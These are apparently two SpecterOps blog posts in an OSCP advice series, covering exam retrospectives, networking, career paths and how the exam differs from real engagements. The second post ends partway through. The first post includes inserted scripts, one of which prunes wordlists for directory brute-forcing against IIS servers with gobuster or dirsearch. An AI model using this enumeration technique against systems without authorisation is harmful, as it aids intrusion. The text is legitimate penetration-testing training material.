Posts By SpecterOps Team Members - Medium

Getting the Most Value Out of the OSCP: After the Exam
Kieran Croucher

In the final post of this series, I’ll discuss what to do after your latest exam attempt to get the most value out of your OSCP journey.

DISCLAIMER:
All opinions expressed in this article are solely my own. I have reviewed the content to ensure compliance with OffSec’s copyright policies and agreements. I have not been sponsored or incentivized in any way to recommend or oppose any resources mentioned in this article.

Introduction

Throughout this series, I’ve shared practical advice for PEN-200: Penetration Testing with Kali Linux students seeking to maximize the professional, educational, and financial value of pursuing the Offensive Security Certified Professional (OSCP) certification. So far, I’ve focused on four distinct phases of “the OSCP journey”: 1) pre-enrollment preparation, 2) the course material, 3) the lab networks, and 4) the exam. In this final post, I’ll discuss how students can leverage their most recent exam experience to learn from their mistakes and increase their chances of passing the exam on subsequent attempts. I’ll also share guidance for newly certified OSCP professionals on how to continue their cybersecurity journey with purpose and direction.


After the Exam…

“To finish the moment, to find the journey’s end in every step of the road, to live the greatest number of good hours, is wisdom.” — Ralph Waldo Emerson

What you do after each OSCP exam attempt carries both short- and long-term implications for your professional success. Here are the three takeaways from this post:

  1. Pass or fail, every student should conduct a thorough retrospective of their last exam attempt to determine what went well, where to focus future study efforts, and what productivity sinks to eliminate
  2. For students still trying to pass the exam, connecting with others can inspire new strategies, uncover useful training resources, and impart valuable insight; certified professionals can also use this network for career support and guidance
  3. The final piece of advice in this series is simply to reflect on your OSCP journey so far and decide what you want to pursue next, whether that’s further self-guided study, a new certification, or a job transition

Conduct an Exam Attempt Retrospective

After your OSCP exam—whether you passed or not—the most valuable thing you can do is pause and unpack what actually happened. For students still pursuing the certification, the benefit is clear: increasing the odds of passing the next attempt. However, even newly certified professionals can gain valuable insight by identifying areas for improvement or exam-day “bottlenecks” that hindered productivity. In this section, I propose a structured retrospective methodology, defined here as a deliberate and reflective review of your performance with the goal of identifying what worked, what failed, and what to improve. You can think of it as a technical postmortem of your latest exam attempt.

It took me three attempts to pass the OSCP exam. In my first attempt, I performed well on the standalone machine set but struggled with lateral movement and privilege escalation in the Active Directory (AD) set. I assumed my only obstacle was a lack of familiarity with AD attack vectors, so I rewrote my notes for the appropriate PEN-200 modules and practiced more with AD network exercises. Had I conducted an exam retrospective, however, I would have uncovered several other weaknesses in my approach:

  • An underdeveloped external reconnaissance methodology
  • Poor tradecraft documentation
  • Suboptimal time management

My second attempt resulted in an even poorer performance (I exfiltrated only a single flag) despite being better informed on AD internals. Needless to say, I was shocked and profoundly disappointed.

After pulling myself out of that slump, I mulled over my latest attempt and used the lessons I’d learned to perform significantly better on my third and final try. With that success in mind, I revisited my retrospective process and refined it for this blog series. The workflow is illustrated in the swimlane flowchart diagram below:

The first, and arguably most important, phase of the exam retrospective is data gathering. The quantity, quality, and accuracy of the data you collect at this stage largely determines the retrospective’s value. By the end of this phase, you should have two core outputs that will inform the next stages of analysis:

  • Timeline: Reconstruct your exam attempt as accurately as possible by capturing timestamps of your actions; break down each event by challenge set, machine, attack stage (e.g., reconnaissance, privilege escalation, lateral movement), and report status
  • Machine Breakdown: Review your notes to identify the observable technologies on each of the six exam machines; note the services discovered, attacks or procedures attempted, tools used, and where you stopped along each attack path

After completing the data gathering phase, take a two-pronged approach to the analysis phase:

  1. Identify operational hurdles that ate into your 24-hour testing window and hampered productivity using the exam timeline
  2. Use the machine breakdowns to identify which technologies, tools, or attack stages hindered your exam performance

The goal in both cases is to enumerate deficiencies you can address later in the reconstruction phase. During reconstruction, you will build on your findings by 1) creating a targeted study plan, 2) reorganizing your notes, reference guides, or report templates, and 3) refining your testing methodology and time management strategy.

Start by analyzing your exam timeline and using your observations to guide improvements in your preparation:

1. Did one challenge set (i.e., the AD or independent challenges) take significantly longer than the other or remain incomplete?

This could signal a technical knowledge gap in areas like AD enumeration, Windows/Linux exploitation, or web application testing. If so, adjust your study plan to focus deliberately on these topics before your next attempt. Platforms like Hack The Box (HTB) allow you to filter machines by technology, operating system (OS), or attack type, making it easier to target weak areas and reinforce essential skills.

2. Did missing or incomplete notes, fragmented reference guides, or disorganized report templates cause you to lose time?

If you struggled to retrieve commands or documentation under pressure, it’s time to streamline your tradecraft resources. Consolidate your notes, build out your reference guides, and prep your report templates in advance to minimize exam-day friction.

3. Did you fall into time sinks or go down rabbit holes that led nowhere?

Reflect on how your methodology might have contributed to wasted time. Consider introducing more automation, pruning redundant steps, or adopting a timeboxing approach like the Pomodoro Technique to improve your efficiency.
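The timeline analysis described above (time per challenge set, per machine, and per attack stage, with the long stretches flagged as candidate time sinks) is easy to mechanize once the timeline from the data-gathering phase is written down in a consistent format. The following Python script is an added example, not part of the original post or any OffSec material: the line format, the hypothetical machine names and the sample timeline are all constructed for the example, and a real attempt would be reconstructed from your own notes and screenshot timestamps.

```python
"""Exam-timeline analysis for the retrospective's analysis phase.

Added example, not part of the original post. It turns a timestamped list
of exam events into hours-per-set, hours-per-machine and hours-per-stage
totals so that time sinks stand out. The line format and the sample
timeline below are assumptions made for this example.
"""
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple

# Constructed sample timeline for a hypothetical attempt. One event per line:
# ISO timestamp, challenge set, machine, attack stage, free-text note. Each
# event lasts until the next one; the final 'end' line closes the window.
SAMPLE_TIMELINE = """\
2025-01-01T09:00,AD,DC01,recon,external recon of the AD set
2025-01-01T11:30,AD,MS01,initial-access,foothold on MS01
2025-01-01T14:00,AD,MS01,privesc,local enumeration
2025-01-01T18:30,AD,MS01,privesc,still stuck, trying kernel exploits
2025-01-01T19:00,STANDALONE,WEB01,recon,switched to standalone set
2025-01-01T20:00,STANDALONE,WEB01,initial-access,web foothold
2025-01-01T21:30,STANDALONE,WEB01,privesc,root via misconfiguration
2025-01-01T22:00,STANDALONE,APP02,recon,recon on second standalone
2025-01-02T01:00,STANDALONE,APP02,initial-access,no foothold found
2025-01-02T03:00,BREAK,-,break,sleep
2025-01-02T07:00,AD,MS01,privesc,back to MS01 privesc
2025-01-02T09:00,END,-,end,exam window closed
"""


class Event(NamedTuple):
    when: datetime
    challenge_set: str
    machine: str
    stage: str
    note: str


def parse_timeline(text: str) -> List[Event]:
    """Parse the timeline into Events sorted by timestamp; skip blanks/comments."""
    events: List[Event] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # The note may itself contain commas, so split on the first four only.
        ts, cset, machine, stage, note = line.split(",", 4)
        events.append(Event(datetime.fromisoformat(ts), cset, machine, stage, note))
    return sorted(events, key=lambda e: e.when)


def hours_spent(events: List[Event]) -> Dict[str, Dict[str, float]]:
    """Total hours per challenge set, per machine and per machine/stage.

    An event's duration is the gap until the next event, so the closing
    'end' marker contributes nothing. Breaks are kept under machine '-' so
    the totals still add up to the whole window.
    """
    by_set: Dict[str, float] = defaultdict(float)
    by_machine: Dict[str, float] = defaultdict(float)
    by_stage: Dict[str, float] = defaultdict(float)
    for cur, nxt in zip(events, events[1:]):
        hours = (nxt.when - cur.when).total_seconds() / 3600
        by_set[cur.challenge_set] += hours
        by_machine[cur.machine] += hours
        by_stage[f"{cur.machine}/{cur.stage}"] += hours
    return {"set": dict(by_set), "machine": dict(by_machine), "stage": dict(by_stage)}


def time_sinks(events: List[Event], timebox_hours: float) -> List[str]:
    """Machine/stage combinations that consumed more than the timebox.

    Breaks (machine '-') are excluded; everything else over the limit is a
    candidate answer to the 'rabbit hole' question in the analysis phase.
    """
    totals = hours_spent(events)["stage"]
    return sorted(
        key for key, hours in totals.items()
        if hours > timebox_hours and not key.startswith("-/")
    )


if __name__ == "__main__":
    evts = parse_timeline(SAMPLE_TIMELINE)
    for scope, totals in hours_spent(evts).items():
        for name, hours in sorted(totals.items(), key=lambda kv: -kv[1]):
            print(f"{scope:8} {name:24} {hours:5.1f} h")
    print("over 3h timebox:", time_sinks(evts, 3.0))
```

On the constructed sample the script reports that one machine's privilege-escalation stage absorbed seven of the twenty-four hours across two separate sittings, which is exactly the kind of sunk-cost pattern that is hard to see while the exam is running and obvious once the timeline is aggregated. The timebox threshold is deliberately a parameter: pick the value you plan to enforce on the next attempt and see which stages of the last one would have tripped it.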

In the second step of the analysis phase, use the exam machine breakdowns you created earlier to answer the following questions and develop action items:

1. Did you fail to exploit or enumerate any technologies or services?

Use these insights to shape a focused study plan. Again, use platforms like HTB to practice against the specific technologies or services you missed, and prioritize hands-on training resources over passive reading when deciding how to spend your study time.

2. Did you discover a vulnerability but fail to exploit it due to tool issues or syntax errors?

Explore alternative tools that better align with your workflow and update your reference guide with accurate syntax and usage examples. Link entries in your reference guide for given exploitation techniques to examples of HTB or OffSec lab machines where you successfully executed those techniques. Aim to maintain at least two tools for each post-exploitation task: one that runs from your Kali Linux box and another that you can execute on a compromised host (e.g., a PowerShell script or .NET assembly). Apply the same principle to external recon tasks. Keeping your toolkit diverse and your notes accurate can save critical time under pressure.

3. Did specific attack stages (e.g., external reconnaissance, privilege escalation, credential harvesting) not return actionable results or break down?

Revisit and revise your methodology. Resources like HackTricks and Swissky’s cheatsheets can help close knowledge gaps. Add checkboxes or mind maps to your processes for common services (e.g., FTP, SMB, and HTTP) to ensure thorough and repeatable enumeration. Apply the same structured approach to post-exploitation workflows for both Windows and Linux targets. Test your updated methodology against easy-to-medium HTB machines to validate your changes before the next attempt.

By the end of both analyses, you should have a concrete plan to address the weaknesses exposed during the retrospective. If you’re still preparing for the OSCP—or simply want to gauge your progress—allocate time to retest your skills and methodology after completing your action items. If you followed my advice from the third post of this series and haven’t yet completed one of the three PEN-200 lab networks that simulate the exam environment, now’s the time. Treat the lab network as your control environment and your new score as the dependent variable: the measurable outcome of your adjusted approach. Once you’re satisfied with the results, reschedule your next OSCP exam attempt.

By following this approach, PEN-200 students will be better prepared for future OSCP exam attempts and better equipped to continue their self-guided education after earning the certification. This methodology can be applied as an iterative feedback loop across multiple attempts, helping to identify skill gaps and drive continuous improvement. As long as students maintain a positive attitude and a genuine interest in self-discovery, they can expect steady progress in both exam performance and testing confidence.

Network With Industry Professionals and Fellow Students

Throughout the OSCP study process, it’s easy to become hyperfocused and socially isolated. In doing so, students often miss out on one of the PEN-200’s greatest strengths: its expansive network of peers, mentors, and potential professional contacts. Whether you’ve already earned your OSCP or are still working through the exam process, connecting with others can transform the solitary grind of preparation into a collaborative, enriching journey and accelerate your professional aspirations.

As a current PEN-200 student, networking offers opportunities to learn, share, and stay motivated. After I failed my second attempt, I reached out to a friend enrolled in PEN-300: Advanced Evasion Techniques and Breaching Defenses and asked if I could shadow him while we both worked on HTB Pro Labs. During those sessions, we swapped enumeration checklists, shared our favorite tools, and discussed our approaches to exam retrospectives. Other students can benefit from networking by finding accountability partners, joining study groups, discovering new exploitation strategies, and staying emotionally grounded throughout this challenging process.

NOTE:
One of my favorite takeaways from shadowing mock penetration tests was learning how to speed up directory brute-force enumeration on Windows Internet Information Services (IIS) web servers. Windows resolves file paths case-insensitively by default (NTFS is case-preserving, but Win32 path lookups ignore case), so IIS serves /Admin, /ADMIN, and /admin from the same location, whereas a UNIX-like host treats them as three distinct paths. Against IIS you can therefore cut redundant requests by normalizing your wordlist to a single case and removing the resulting duplicates before feeding it to tools like gobuster or dirsearch. Confirm the behavior first by requesting the same path in two different cases and comparing the responses: an application router or reverse proxy in front of IIS may still be case-sensitive, and pruning a list for a case-sensitive target would silently skip valid paths. This is just one example of how collaborating with other OffSec students or ethical hackers can inspire new testing strategies and accelerate your learning process.
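The pruning described in the note above, as an added example that is not part of the original post: a small Python script that collapses case variants in a directory wordlist while keeping the first spelling of each entry and the original order, so the output is a strict subset of the input list. The sample wordlist is constructed for the example; run the script against a real list only after confirming that the target resolves paths case-insensitively.

```python
"""Case-insensitive wordlist pruning for directory brute-forcing.

Added example (not from the original post). IIS on a default Windows
install resolves URL paths case-insensitively, so 'Admin', 'admin' and
'ADMIN' all hit the same resource and a wordlist that contains several
case variants wastes requests. This collapses the variants while
preserving the order of first appearance, which is the order in which
gobuster/dirsearch-style tools read the list.
"""
from typing import Iterable, List, Tuple

# Constructed sample wordlist in the style of common directory lists, with
# case variants and a comment line mixed in.
SAMPLE_WORDLIST = """\
# common dirs (constructed sample)
admin
Admin
ADMIN
images
Images
scripts
Scripts
bin
aspnet_client
Aspnet_Client
web.config
Web.Config
"""


def prune_case_variants(lines: Iterable[str]) -> Tuple[List[str], int]:
    """Return (pruned list, number of entries dropped).

    Entries are compared case-insensitively; the first spelling seen is
    kept so the output is a subset of the input rather than a rewritten
    one. Blank lines and '#' comments are discarded.
    """
    seen = set()
    kept: List[str] = []
    dropped = 0
    for raw in lines:
        word = raw.strip()
        if not word or word.startswith("#"):
            continue
        # casefold() is a slightly more aggressive lower() that also handles
        # a few non-ASCII letters; the kept entry is still the original text.
        key = word.casefold()
        if key in seen:
            dropped += 1
            continue
        seen.add(key)
        kept.append(word)
    return kept, dropped


def prune_wordlist_file(src_path: str, dst_path: str) -> int:
    """Prune src_path into dst_path; return the number of entries dropped."""
    with open(src_path, encoding="utf-8", errors="replace") as fh:
        kept, dropped = prune_case_variants(fh)
    with open(dst_path, "w", encoding="utf-8") as out:
        out.write("\n".join(kept) + "\n")
    return dropped


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        n = prune_wordlist_file(sys.argv[1], sys.argv[2])
        print(f"dropped {n} case-duplicate entries")
    else:
        words, n = prune_case_variants(SAMPLE_WORDLIST.splitlines())
        print(f"{len(words)} kept, {n} dropped:", words)
```

Run it as `python prune_wordlist.py raw.txt pruned.txt` and pass pruned.txt to gobuster or dirsearch. On the constructed sample, twelve entries collapse to six. Keep the unpruned list around as well: if the two-case probe described in the note shows the target is case-sensitive, use the original.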

For newly certified OSCP holders, networking takes on renewed importance. Earning the certification opens doors to job opportunities, interviews, and professional conversations that weren’t accessible before—but you can’t expect to walk through them without making connections first. Talking with people who are deeply embedded in the industry also provides insights that static courses can’t realistically capture like real-time knowledge about evolving roles, industry or specific company expectations, and career path requirements that wax and wane with industry trends. Networking also helps you plan the next phase of your self-guided education—whether that means expanding on PEN-200 concepts, charting your own course by exploring new cybersecurity domains, building a home lab, or other ideas I’ll cover later in the post. Conversations with those who’ve already moved beyond PEN-200 can help you set clear goals, avoid common pitfalls, and stay aligned with the rapidly evolving demands of the offensive security industry.

The most obvious networking platform for PEN-200 students is the official OffSec Discord server, but many other communities are worth exploring:

  • Discord Servers: HackTheBox, TryHackMe, Kali Linux & Friends, and DEFCON host active pocket communities of current and former PEN-200 students
  • OffSec Office Hours: The OffSec Discord hosts weekly livestreams on Fridays where an instructor walks through an OffSec Proving Grounds machine; these sessions are a great way to stay sharp and engage with other OSCP-hopefuls
  • Reddit: The r/oscp subreddit focuses specifically on OSCP-related content, though the quality and tone of posts can vary (it is Reddit, after all)
  • Content Creators: Figures like IppSec, The Cyber Mentor, and Tib3rius regularly produce livestreams and educational material, maintaining active online communities where you can connect with like-minded learners
  • LinkedIn: Many OffSec students use LinkedIn to showcase their OSCP certification, share their learning journeys, comment on others’ milestones, and build professional relationships
  • In-Person Events: Local meetups such as OWASP Local Chapters, Security BSides events, or regional DEF CON Groups are great places to find a supportive community, sharpen your skills, define a new career path, and potentially meet future travel partners for a trip to the world-famous DEF CON conference in Las Vegas


Whether you’re newly certified or still grinding to earn the OSCP, don’t neglect the networking opportunities this journey presents. As a current student, sharing tips and hurdles keeps you technically informed and motivated. As a newly minted OSCP, connecting with career mentors and peers reinforces your knowledge and expands your professional circle. By engaging in Discord servers, study group meetups, or LinkedIn discussions, you gain real-time insights, accountability, and a support network that lasts well beyond the exam. No matter where you are in the OSCP journey, investing time in these communities accelerates your learning and lays the groundwork for long-term success in offensive security.

Ask Yourself, “What’s Next?”

I would like to take a moment to personally congratulate everyone reading this who has recently passed the OSCP exam. You’ve likely invested months—if not years—into earning this credential, amassing a solid foundation of experience and knowledge along the way. Ask yourself: What did you enjoy most? What would you prefer to avoid in the future? These reflections can guide your next challenge, the skills you want to sharpen, and your broader career direction. To close out this series, I’d like to explore those possibilities and highlight how they can enhance your professional profile.

First things first: take a break. Seriously. You’ve reached an impressive milestone and while it’s tempting to dive immediately into the next pursuit, give yourself time to rest and decompress. If possible, take a vacation (or at least a few days off) to recover from the intensity of exam prep.

Before deciding what’s next, update your resume to include your OSCP certification and prepare for the job hunt. If you’re entering the cybersecurity job market, I highly recommend the Infosec Job Hunting w/ BanjoCrashland YouTube playlist. It covers everything from finding job postings and writing resumes to networking and interview preparation. Many of the techniques taught in that playlist are open-source intelligence (OSINT) gathering techniques, so practicing them doubles as skill development for future offensive roles. The creator, Jason Blanchard of Black Hills Information Security, also hosts a weekly Twitch stream, Job Hunt Like a Hacker, which expands on these lessons with real-time advice and feedback. While I haven’t attended the stream personally, at least 278 people (as of this writing) credit Blanchard and his content for helping them successfully pivot into cybersecurity—an endorsement of both his insight and the supportive community he’s fostered.

Many OSCP holders choose to write a public reflection on Medium, LinkedIn, or a personal blog platform. If you do the same, structure it like a retrospective: document what went well, what didn’t, how you studied, and what you would change in hindsight. Avoid spoilers, walkthroughs, or anything that could violate OffSec Terms and Conditions. A well-written reflection not only inspires other PEN-200 students but can also serve as a networking tool, a technical writing sample, and a resume booster. Take your time writing it and ensure it’s something you’re proud to attach your name to.

This whole series has focused on one cybersecurity certification (the OSCP) and briefly mentioned a few others. In spite of that, I recommend caution before making another certification your next professional goal. As I said in the first post of this series, it’s important to view all certifications through a critical lens. The certification industry is, ultimately, a business and students should remain conscious of marketing narratives that inflate their importance or imply that earning one guarantees employment in your field of choice. Rather than chasing credentials to bypass every human resources (HR) filter—a Sisyphean task, in my opinion—focus instead on crafting a narrative of steady, deliberate growth in your ethical hacking journey. That narrative can include certifications, but it could also highlight personal projects, practical experience, and self-guided exploration. In short, learn to wield certifications like a scalpel rather than a claymore while also peppering your journey with cost-effective resume boosters.

For example, many offensive security professionals pursue the Certified Red Team Operator (CRTO) or Offensive Security Experienced Penetration Tester (OSEP) after earning the OSCP. Equally valid (and often more cost-effective) alternatives include climbing the ranks on HTB, developing your own command and control (C2) framework, or participating in bug bounty programs on platforms like HackerOne or Bugcrowd. A few strategic acronyms on your resume can open doors, but too many can spell doom for your wallet.

PEN-200 offers valuable lessons, but it’s still an entry-level certification and only scratches the surface of many cybersecurity topics. If you want to build on its concepts at a higher level, consider the following:

  • Web Applications

While PEN-200 introduces core techniques like SQL injection (SQLi) and cross-site scripting (XSS), the web app security field itself spans hundreds of server-side and client-side vectors, subtle edge cases, and novel exploitation methods that researchers are constantly discovering. PortSwigger Academy is my favorite free platform for advancing these skills, as it offers comprehensive written material and interactive labs.

  • AD Attack Vectors

AD represents a massive attack surface and the PEN-200 therefore covers only the fundamentals while omitting topics like Kerberos delegation, Active Directory Certificate Services (ADCS), and Microsoft Configuration Manager (MCM/SCCM). Use BloodHound Community Edition as both an addition to your toolkit and a knowledge base for improving AD tradecraft.

  • Reporting

As mentioned in the third post of this series, technical reporting may be the most transferable skill from the PEN-200 into real-world engagements. Refer back to the included resources in that article and set time aside to improve this area.

  • Red Teaming

While red teaming overlaps significantly with penetration testing, it emphasizes different skills such as persistence, command and control, and exfiltration. Explore techniques relevant to these domains and learn how to adapt each PEN-200 post-exploitation technique to blend with legitimate network traffic, enhancing stealth.

NOTE:
The differences between penetration testing and red teaming are often subtle and vary between organizations. Understanding these nuances is crucial when entering the job market, as mismatched expectations can hinder a successful career pivot. My favorite explanation comes from JUMPSEC, which notes that penetration testing aims to uncover as many flaws as possible, while red teaming focuses on achieving specific objectives to demonstrate real-world impact. Red teaming also places greater emphasis on operational security (OPSEC) evasion and threat actor emulation.

There are even more offensive security topics not covered in PEN-200 that may interest you:

  • Cloud Security

Just as pervasive as web applications, cloud platforms—such as Amazon Web Services (AWS), Google Cloud Platform (GCP), and Microsoft Azure—present huge attack surfaces. HackTricks Training is a relatively new but solid starting point for offensive cloud security training.

  • Wireless Security

While access to PEN-210: Foundational Wireless Network Attacks and an OffSec Wireless Professional (OSWP) exam voucher are available to OffSec Learn One subscribers, you might try the free WiFiChallenge Lab first before enrolling in another certification program.

  • Malware & Payload Development

Maldev Academy and SEKTOR7 Institute come highly recommended throughout the industry. The skills these courses help you develop are essential to advanced post-exploitation, red teaming, and custom implant engineering.

  • Other Domains

Other common domains are mobile devices and applications, industrial control systems (ICS), Internet of Things (IoT) devices, large language model (LLM) web applications, social engineering, and physical access control systems (PACS).

I wrote this series for PEN-200 students whose goal is to pivot into the offensive security consulting industry; however, that is only one demographic of the PEN-200 student body. Many students pursuing the OSCP are considering (or already employed in) fields tangential to penetration testing and red teaming. If you’re more aligned with adjacent fields like reverse engineering, development, security, and operations (DevSecOps), security operations center (SOC), or detection engineering, there are valuable resources for those too:

  • Reverse Engineering & Malware Analysis

Try Malware Unicorn’s Reverse Engineering 101 or HackerSploit’s Malware Analysis Bootcamp for free, the latter of which concludes with case studies of artifacts from the 2018 Flare-On Challenge capture the flag (CTF) event and the cyberweapon Stuxnet (used during the sabotage campaign of Iranian nuclear enrichment facilities known as Operation Olympic Games).

  • DevSecOps

I highly recommend the corporate training program Secure Code Warrior or the more affordable Hacksplaining platform for individuals looking to improve their secure development skills.

  • SOC

SOC analysts are often on the front lines of incident detection and response. Utilize online training platforms like CyberDefenders or TryHackMe, both of which offer learning paths for SOC levels 1–3. Radiant Security has a helpful explanation of the differences between these tiers.

  • Detection Engineering

Now that you understand how many fundamental attacks work, flip the perspective by learning how to detect malicious behavior, craft alerts, and better understand attacker tradecraft. Budget-conscious learners can start with Practical Threat Detection Engineering from Packt and its accompanying code repository, while Applied Network Defense offers a well-regarded catalog for those seeking deeper coverage.

  • Other Domains

Other common domains are digital forensics and incident response (DFIR), governance, risk, and compliance (GRC), cyber threat intelligence (CTI), and threat hunting.

NOTE:
As with all commercial training options, consider whether the return on investment (ROI) justifies enrollment.

Lastly, consider how you might participate in or give back to the information security community. If you live in or near a city, look for volunteer opportunities as a technical coach for underrepresented communities (e.g., older citizens, non-native English speakers, or individuals with physical or cognitive disabilities) or as a volunteer network engineer for nonprofit organizations. Consider volunteering at a local public school to talk about careers in cybersecurity and what drew you to ethical hacking. Many diversity-focused nonprofit organizations and affinity groups in cybersecurity offer valuable resources like career mentorship, CTF events, digital privacy training, and financial sponsorship for professional development. Notable examples include Women in Cybersecurity (WiCyS), Blacks in Cybersecurity (BIC), Latinas in Cyber (LAIC), Secure Diversity, and Minorities in Cybersecurity (MiC). Getting involved with these groups can expand your network, strengthen your resume, and allow you to give back to the community in meaningful ways.

Earning the OSCP is an extraordinary accomplishment, but it’s just one checkpoint in a much longer and more worthwhile journey. Whether you continue with more certifications, lab projects, or community involvement, remember to stay curious, humble, and ethical. Make your next steps intentional, and remember: as with the OSCP, the process itself should be as rewarding as the prize.

Conclusion

It’s been a privilege to write this series and I’m grateful to my colleagues and friends for their valuable feedback and ongoing support. As always, I welcome your questions, constructive critiques, or additional advice for current and future PEN-200 students in the comments.


Getting the Most Value Out of the OSCP: After the Exam was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

Getting the Most Value Out of the OSCP: The Exam
Kieran Croucher

A practical guide to maximizing the short- and long-term benefits of your upcoming OSCP exam attempt(s).

DISCLAIMER:
All opinions expressed in this article are solely my own. I have reviewed the content to ensure compliance with OffSec’s copyright policies and agreements. I have not been sponsored or incentivized in any way to recommend or oppose any resources mentioned in this article.

Introduction

In the last post in this series, I discussed a few proactive steps students should take throughout the PEN-200: Penetration Testing with Kali Linux labs as part of their efforts to earn the Offensive Security Certified Professional (OSCP) certification. In this entry, let’s focus on test day itself—and how to maximize the educational, financial, and professional value of the OSCP exam experience.


During the Exam(s)…

“You may be disappointed if you fail, but you are doomed if you don’t try.” — Beverly Sills

Congratulations—you’re now ready to take the OSCP exam! Although the exam is the shortest of the five phases in the “OSCP journey”, there are still important steps you can take to ensure you’re getting your money’s worth. Here are three key takeaways for all future exam-takers:

  1. The OSCP exam is designed to mimic a black-box penetration test, but due to the nature of standardized testing, it inevitably falls short of being a perfect replica of a real-world engagement; while this is completely reasonable, it helps to be prepared to speak to these nuances in future job interviews and not to confuse exam-specific tactics with best practices in the field
  2. Certification exams—for better or worse—play a role in many offensive security consulting careers, so it’s best to set a precedent for sustainable and practical test-taking behavior by developing realistic, ethical, and repeatable exam-day practices and using them during your OSCP attempt(s)
  3. Follow OffSec’s exam-day instructions to the letter, as even minor deviations could invalidate months (or years) of work toward the OSCP and may disqualify you from future OffSec certifications

Understand the Differences Between the OSCP Exam and Real-World Practice

While the OSCP exam certainly tests your offensive security knowledge, it’s important to understand what the exam is and isn’t. OffSec has gone to great lengths to make the OSCP a realistic simulation of a black-box penetration test; however, to ensure fair grading and timely results, it comes with inherent limitations. By recognizing these gaps ahead of time, students can better interpret their exam experience, set realistic expectations for future consulting roles, better articulate their skills in interviews, and avoid drawing the wrong conclusions about what the certification does (or doesn’t) prove to a technical recruiter.

While not an exhaustive list, here are the differences I consider the most significant to keep in mind:

  • Team Collaboration: Although the OSCP exam is a solo endeavor, operators seldom work alone in real-world engagements; exceptions may exist for engagements with extremely limited scope or niche objectives, but most involve at least two consultants
  • Client Interaction: During the exam, your only contact is with the OSCP proctor(s); in a real engagement, you should expect to interact with business managers, engineers, security operations center (SOC) employees, and a designated point of contact (POC) throughout the lifecycle of a client-consultant relationship
  • Scope Definition and Rules of Engagement (ROE): While the Exam Restrictions in the exam guide could be interpreted as a partial ROE, real-world assessments include far more comprehensive documentation and carry legal consequences for violating it; consultants may also be involved in negotiating the scope of upcoming engagements
  • Engagement Objectives and Metrics: The objective of the OSCP exam is to gain initial and elevated access to as many systems as possible; in contrast, real-world assessments—especially red team exercises—may involve more targeted objectives, like exfiltrating dummy data, compromising specific users or systems, bypassing defenses, or demonstrating how vulnerabilities are tied to business impact
  • Operating with Due Caution: Whereas the OSCP exam gives candidates near-total freedom within the simulated network (aside from a few restricted attacks and tools), real-world consultants must consider the impact of their actions on live systems and people, adapting their approach as needed; consultants will often request POC approval before executing commands that could trigger account lockouts or system downtime
  • Deconfliction: If an attack is detected, SOC teams may raise a deconfliction event to confirm it was part of the assessment; if not confirmed, the alert could trigger a full-scale incident response process
  • Post-Engagement Procedures: After the OSCP exam, the student’s only obligation is to submit a report; in contrast, wrapping up legitimate consulting engagements may involve artifact cleanup, resolving deconfliction events, stakeholder presentations, blue team debriefs, infrastructure teardown, and secure data destruction
  • Cloud-Hosted Tools: Using third-party or cloud-hosted tools to process clients’ artifacts—such as for reverse engineering, data exfiltration, or hash cracking—carries the risk of exposing secrets to systems beyond client or consultant control; because the OSCP exam uses entirely fictional data, its restrictions around cloud usage are more flexible
  • Timeline: The OSCP exam splits the practical and reporting components into two ~24-hour phases that test a candidate’s ability to rapidly identify, exploit, and document vulnerabilities; in contrast, real-world engagements typically span several weeks per phase depending on scope and client expectations
  • Threat Modeling: Some assessments require consultants to emulate specific threat actors by using a tailored subset of tactics, techniques, and procedures (TTPs); during the OSCP, students are not bound by these constraints
  • Kali Linux Requirement: The OSCP must be completed using a Kali Linux VM, but while Kali is a popular Linux distribution for ethical hacking, its large toolset increases both operational overhead and the probability of detection; real-world operators often use custom minimal Linux builds with obfuscated toolkits deployed via continuous integration and continuous delivery/deployment (CI/CD) pipelines to reduce both detection risk and scaling costs
  • Social Engineering: While the OSCP exam may involve limited client-side attacks (an assumption based on the fact that there is a “Client-Side Attacks” module in the publicly available syllabus), its highly automated structure means it offers few opportunities to exploit the weakest link in any cybersecurity program: the human element; in real-world assessments, consultants may use tactics like spear-phishing, vishing, or smishing (if the ROE permits it) to achieve credential access or arbitrary code execution (ACE) capabilities
  • Physical Security: Some assessments allow physical intrusion tactics—such as piggybacking/tailgating or lock-picking—to gain access to critical infrastructure and test physical security controls; while not feasible during the OSCP exam and somewhat niche, it’s still valuable to conceptually understand these attack vectors

The OSCP is an achievement to be proud of, but it doesn’t perfectly mirror professional practice. Keeping these differences in mind, students can more accurately frame their OSCP experience, communicate their skills more effectively, and set realistic expectations for job responsibilities. Recognizing its limitations is a critical step toward bridging the gap between certification and your career.

Develop Healthy Exam Habits

If this is your first multi-day practical exam, it’s best to build healthy habits and eliminate disruptive ones early. This sets you up for long-term success and a better experience in future exams, regardless of which certification you’re pursuing.

The OSCP exam, for those unfamiliar, is a grueling ordeal. It begins with a 23-hour, 45-minute technical assessment where the student must exfiltrate a minimum number of flags from six machines. Three of these are standalone targets that require the student to complete the full attack path—from initial access to privilege escalation. The other three form an Active Directory (AD) set, where the student is granted access as a lower-privileged user and escalates to Domain Admin or equivalent-level access. To pass, students must capture enough flags to reach at least 70 out of 100 points (each flag is worth 10 points). They’re then given ~24 more hours to submit a professional report detailing how they achieved each objective. Needless to say, it’s an exhausting endeavor and a major source of stress for many.

As painful as it is to admit, the OSCP—for all its notoriety and difficulty—is considered an entry-level certification in offensive security consulting. It covers a wide breadth of knowledge but ultimately scratches the surface of or doesn’t attempt to address topics like evading operational security (OPSEC) solutions, deploying and maintaining command and control (C2) infrastructure, and identifying more advanced vulnerabilities, to name a few. While certifications aren’t strict gatekeepers to the industry or career advancement, an employer may eventually require you to pursue more advanced practical exams (or you may feel pressured to do so to stay competitive in the job market). With that in mind, and especially if the OSCP is your first multi-day practical exam, it’s in your best interest to develop sustainable exam habits early on to avoid building a detrimental relationship with certifications.

Let’s start with the simplest, yet arguably hardest, topic: sleep. While it may be tempting to pull an all-nighter and grind through flags as quickly as possible, this approach is likely counterproductive. Research consistently shows that sleep deprivation impairs cognitive functioning, stifles creativity, and slows reaction times—all of which are essential during the OSCP exam. Some studies even suggest that sleeping more than usual the night before a test is correlated with better performance. For multi-day exams, I aim for at least eight hours of sleep each night, regardless of how much progress I made the day before. If you’re interested in the science behind sleep, I highly recommend Why We Sleep by Matthew Walker, PhD.

